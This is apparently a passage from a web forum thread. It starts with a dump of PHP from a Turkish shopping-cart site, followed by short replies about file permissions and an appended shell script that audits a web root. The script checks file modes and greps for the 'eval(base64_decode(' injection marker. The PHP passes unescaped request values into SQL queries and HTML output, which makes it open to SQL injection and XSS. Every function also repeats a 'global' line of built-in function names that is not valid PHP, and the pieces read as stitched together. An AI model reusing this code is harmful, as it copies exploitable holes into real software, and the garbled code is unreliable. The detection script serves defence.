ozellik3='$ozellik3' AND urunID='$urunID' AND randStr='".$_SESSION['randStr']."'")) $stop=true;if (!$stop) { $fiyat = fixFiyat((float)dbInfo('urun','fiyat',$urunID)); mysql_query("insert into sepet ( ID , urunID , userID, ytlFiyat,fiyat,fiyatBirim, ozellik1 , ozellik2, ozellik3, adet, durum, randStr ,tarih)  values('','$urunID','$userID', '".YTLfiyat($fiyat,dbInfo('urun','fiyatBirim',$urunID))."','".$fiyat."' ,'".dbInfo('urun','fiyatBirim',$urunID)."','$ozellik1','$ozellik2','$ozellik3',1,0,'".$_SESSION['randStr']."',now())") or die(mysql_error() + "error");}if ($_GET['hemenal'] == "true") $out="<script> window.location='page.php?act=satinal&op=adres';</script>"; } return $out;}function insertToDb($dbName) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  $keynum = 5; foreach ($_POST as $key => $value) {if (substr($key,0,$keynum) == "data_") { $insertTo.= str_replace("data_","",$key).", "; $insertValue.= "'$value', ";}} if ($_POST['t'] == $_GET['t'.($keynum-1)]) $total=1; $total++; $insertTo = substr($insertTo,0,strlen($insertTo) -$total);$insertValue = substr($insertValue,0,strlen($insertValue) -$total); mysql_query("insert into $dbName ($insertTo) values ($insertValue)") or die(mysql_error()); return mysql_insert_id(); }$_POST['t']='dd';function itemOrder() { global 
arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  $out='<table width=100%><form name="urunsirala" method="get" action="page.php"><input type="hidden" name="act" value="'.$_GET['act'].'"><input type="hidden" name="catID" value="'.$_GET['catID'].'"><tr><td width=100% bgcolor="#e5e9ef"></td><td><select name="markaID" id="markaID"><option value="">'._lang_tumMarkalar.'</option>'.generateBrands('Option').'</select></td><td><select name="orderBy" id="orderBy"><option value="tarih desc">'._lang_tariheGore.'</option><option value="fiyat asc">'._lang_fiyataGore.'</option><option value="marka.name asc">'._lang_markayaGore.'</option><option value="name asc">'._lang_urunAdinaGore.'</option></select></td><td><span style="color:red;text-decoration:underline; cursor:pointer;" onclick="document.urunsirala.submit();">'._lang_sirala.'</span></td></tr></form></table>'; $out.=jselect('markaID',$_GET['markaID']); $out.=jselect('orderBy',$_GET['orderBy']); return $out;}function jselect($selectid,$dbvalue) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  $out.="<script language='javascript'>

		   for (var i = 0; i < document.getElementById('$selectid').options.length; i++)

			{	

				if ((document.getElementById('$selectid').options[i].text == '$dbvalue' || document.getElementById('$selectid').options[i].value == '$dbvalue') && '$dbvalue' != '') document.getElementById('$selectid').options[i].selected = true;

			}
		   </script>	

			"; return $out;}function kargoHesapla($ToplamDesi,$randStr) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  $Sehir = hq('select city from siparis where randStr = \''.$randStr.'\''); if ($Sehir && $ToplamDesi) {return (hq('select fiyat from kargoDesi where bolgeID = \''.hq('select bolgeID from kargoSehir where plakaID = \''.$Sehir.'\'').'\' AND desiBaslangic < '.$ToplamDesi.' AND desiBitis > '.$ToplamDesi.' order by fiyat desc limit 0,1')); } else return 0;}function generateHavaleForm() { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  if (!$_GET['sn']) return; global $siteConfig; $out='<table width="100%"><form method="POST"><tr><th></th><th>'._lang_banka_banka.'</th><th>'._lang_banka_sube.'</th><th>'._lang_banka_hesapNo.'</th><th>'._lang_banka_hesapSahibi.'</th></tr>'; $x = mysql_query('select * from bankaHavale order by bankaAdi'); while ($d = mysql_fetch_array($x)) {$out.='<tr><td><input ID="haveleID_'.$d['ID'].'" type="radio" name="bankaID" value="'.$d['ID'].'"></td><td><label for="haveleID_'.$d['ID'].'">'.$d['bankaAdi'].'</label></td><td><label for="haveleID_'.$d['ID'].'">'.$d['bankaSubeAdi'].' 
('.$d['bankaSubeKodu'].')</label></td><td><label for="haveleID_'.$d['ID'].'">'.$d['bankaHesapNo'].'</label></td><td><label for="haveleID_'.$d['ID'].'">- '.$d['bankaKullaniciAdi'].'</label></td></tr>'; } $out.='</table><br><table width="100%"><tr><td><input type="image" src="templates/'.$siteConfig['templateName'].'/images/form_Onayliyorum.gif"></td></tr></form></table>'; if (isset($_POST['bankaID'])) {if ($_SESSION['userID'] == hq("select userID from siparis where randStr = '".$_GET['sn']."'")) { mysql_query("insert into bankaHavaleBildirim values (null,'".$_GET['sn']."',".$_POST['bankaID'].",now())"); $out=_lang_banka_havaleGonderim;}else $out="<script>alert(':)')</script>"; } return $out;}function listOrders() { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  $out ='<table class="sepet" cellpadding=0 cellspacing=2><tr>'; $out.='<th>'._lang_siparis_no.'</th>'; $out.='<th>'._lang_siparis_siparisNo.'</th>'; $out.='<th>'._lang_siparis_tutar.'</th>'; $out.='<th>'._lang_siparis_tarih.'</th>'; $out.='<th>'._lang_siparis_durum.'</th>'; $out.='<th>'._lang_siparis_detaylar.'</th>'; $out.='</tr>'; $filterStatus = ($_GET['status'] ? ' AND durum='.$_GET['status']:''); $q=mysql_query("select * from siparis where durum != 0 AND userID='".$_SESSION['userID']."' $filterStatus"); $i=1; while ($d = mysql_fetch_array($q)) {$class=(!($i%2)?'tr_normal':'tr_alternate');$out.='<tr class="'.$class.'" style="cursor:

Right... Care to elaborate?

Also check the permissions on the files and folders on your site. Ideally you want the permissions to be 0644 on files and 0755 on folders.
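The permission advice in the reply above, as an added example that is not code from the thread: a POSIX shell audit that lists files not at 0644, directories not at 0755, anything world-writable, and `.php`/`.js` files containing the `eval(base64_decode(` line quoted in the question. The function names and the sample tree are constructed for illustration.

```bash
#!/bin/sh
# Added example: audit a web root against the modes suggested in the reply
# (0644 for files, 0755 for directories). Function names are illustrative.

# Regular files whose mode is not exactly 0644.
files_off_policy() {
    find "$1" -type f ! -perm 0644 -print
}

# Directories whose mode is not exactly 0755.
dirs_off_policy() {
    find "$1" -type d ! -perm 0755 -print
}

# Files or directories with the "other" write bit set (writable by any account).
world_writable() {
    find "$1" \( -type f -o -type d \) -perm -0002 -print
}

# .php/.js files that contain the injected marker quoted in the question.
# grep exits 1 when nothing matches and find passes that on, so "|| true"
# keeps an empty result from looking like an error.
injected_files() {
    find "$1" -type f \( -name '*.php' -o -name '*.js' \) \
        -exec grep -lF 'eval(base64_decode(' {} + || true
}

# Run every check, print findings grouped by check, return 1 if any were found.
audit_webroot() {
    audit_root=$1
    audit_status=0
    for check in files_off_policy dirs_off_policy world_writable injected_files; do
        hits=$("$check" "$audit_root")
        if [ -n "$hits" ]; then
            printf '[%s]\n%s\n' "$check" "$hits"
            audit_status=1
        fi
    done
    return "$audit_status"
}

# Reset modes to the suggested policy. This changes permissions only;
# it does not touch file contents, so injected code is still there afterwards.
apply_policy() {
    find "$1" -type d -exec chmod 0755 {} +
    find "$1" -type f -exec chmod 0644 {} +
}

# Constructed sample tree for trying the checks: one clean file, one file
# carrying the marker with mode 0666, and one world-writable directory.
make_sample_tree() {
    mkdir -p "$1/inc" "$1/uploads"
    printf '<?php echo "ok";\n' > "$1/index.php"
    printf '<?php /**/eval(base64_decode(%s));\n' "'QUJD'" > "$1/inc/lib.php"
    chmod 0755 "$1" "$1/inc"
    chmod 0777 "$1/uploads"
    chmod 0644 "$1/index.php"
    chmod 0666 "$1/inc/lib.php"
}

# Audit the directory given on the command line, if any.
if [ $# -gt 0 ]; then
    audit_webroot "$1"
fi
```

Pass the web root as the only argument; a non-zero exit status means at least one check reported something. Resetting the modes with `apply_policy` leaves any file flagged by `injected_files` still flagged, so those files need to be restored from a clean copy.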
